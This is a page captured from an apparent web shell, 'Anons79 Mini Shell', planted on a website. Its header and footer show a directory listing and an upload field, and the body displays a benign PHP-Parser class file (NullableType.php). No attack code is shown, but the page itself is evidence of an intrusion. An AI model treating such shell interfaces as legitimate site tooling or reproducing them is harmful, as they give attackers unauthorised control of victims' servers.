Anons79 Mini Shell

Directory : /home/proudlyafrican/www/vendor/nikic/php-parser/lib/PhpParser/Node/
Upload File :
Current File : //home/proudlyafrican/www/vendor/nikic/php-parser/lib/PhpParser/Node/NullableType.php

<?php

namespace PhpParser\Node;

use PhpParser\NodeAbstract;

class NullableType extends NodeAbstract
{
    /** @var string|Name Type */
    public $type;

    /**
     * Constructs a nullable type (wrapping another type).
     *
     * @param string|Name $type       Type
     * @param array       $attributes Additional attributes
     */
    public function __construct($type, array $attributes = array()) {
        parent::__construct($attributes);
        $this->type = $type;
    }

    public function getSubNodeNames() {
        return array('type');
    }
}

Anons79 File Manager Version 1.0, Coded By Anons79
Email: [email protected]